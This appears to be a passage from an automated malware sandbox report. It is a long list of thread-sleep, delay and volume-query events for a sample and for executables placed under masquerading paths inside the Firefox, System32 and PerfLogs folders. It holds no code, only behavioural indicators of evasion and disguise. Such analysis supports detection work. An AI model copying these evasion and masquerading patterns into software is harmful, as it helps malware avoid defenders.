            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597812
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597703
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597593
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597484
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597375
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597265
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597154
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597046
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596911
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeWindow / User API: threadDelayed 2008Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeWindow / User API: threadDelayed 2709Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeWindow / User API: threadDelayed 1397Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeWindow / User API: threadDelayed 2996Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeWindow / User API: threadDelayed 929
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeWindow / User API: threadDelayed 3943
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeWindow / User API: threadDelayed 1642
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeWindow / User API: threadDelayed 3492
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeWindow / User API: threadDelayed 2362
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeWindow / User API: threadDelayed 2274
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exe TID: 7428Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -15679732462653109s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -599813s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7892Thread sleep count: 2008 > 30Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7892Thread sleep count: 2709 > 30Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -599703s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -599594s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -599485s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -599360s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -599235s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -599110s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -598985s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -598860s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -598735s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -598610s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -598485s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -598360s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -598218s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -598110s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -597985s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -597846s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -597719s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -597312s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -597175s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -597047s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -596937s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7864Thread sleep time: -596827s >= -30000sJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe TID: 7712Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\PerfLogs\wininit.exe TID: 7748Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exe TID: 7888Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -15679732462653109s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8172Thread sleep count: 1397 > 30Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -599622s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8172Thread sleep count: 2996 > 30Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -599094s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -598984s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -598875s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -598760s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -598594s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -598450s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -598328s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -598219s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -598109s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -597891s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -597672s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -597555s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -597438s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -597324s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -597203s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -597094s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -596955s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -596825s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 8164Thread sleep time: -596659s >= -30000sJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 6792Thread sleep count: 929 > 30
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -599875s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 6792Thread sleep count: 3943 > 30
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -599766s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -599641s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -599529s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -599422s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -599313s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -599188s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -599063s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -598953s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -598844s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -598719s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -598609s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -598494s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -598391s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -598161s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -597972s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -597790s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -597687s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -597578s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -597469s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -597359s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -597250s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -597141s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -597021s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -596907s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3452Thread sleep time: -596782s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 744Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 6020Thread sleep count: 1642 > 30
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -599875s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 6020Thread sleep count: 3492 > 30
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -599765s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -599656s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -599547s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -599437s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -599328s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -598937s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -598750s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -598625s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -598514s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -598406s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -598297s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -598187s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -598066s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -597937s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -597828s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -597718s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -597609s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -597500s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -597390s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -597281s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -597171s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -597062s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -596953s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7504Thread sleep time: -596844s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7592Thread sleep time: -30000s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7428Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -12912720851596678s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -599890s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7712Thread sleep count: 2362 > 30
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7712Thread sleep count: 2274 > 30
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -599781s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -599670s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -599562s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -599452s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -599319s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -599182s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -599074s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -598937s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -598750s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -598609s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -598468s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -598359s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -598250s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -598140s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -598031s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -597921s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -597812s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -597703s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -597593s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -597484s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -597375s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -597265s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -597154s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -597046s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 7708Thread sleep time: -596911s >= -30000s
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe TID: 3916Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\PerfLogs\wininit.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599813Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599703Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599594Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599485Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599360Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599235Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599110Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598985Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598860Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598735Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598610Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598485Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598218Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597846Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597719Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597312Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597175Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597047Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596827Jump to behavior
            Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\PerfLogs\wininit.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\7fGdoA6Inq.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599622Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598760Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598594Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598450Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598328Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598109Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597891Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597672Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597555Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597324Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597203Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 597094Jump to behavior
            Source: C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exeThread delayed: delay time: 596955Jump to behavior
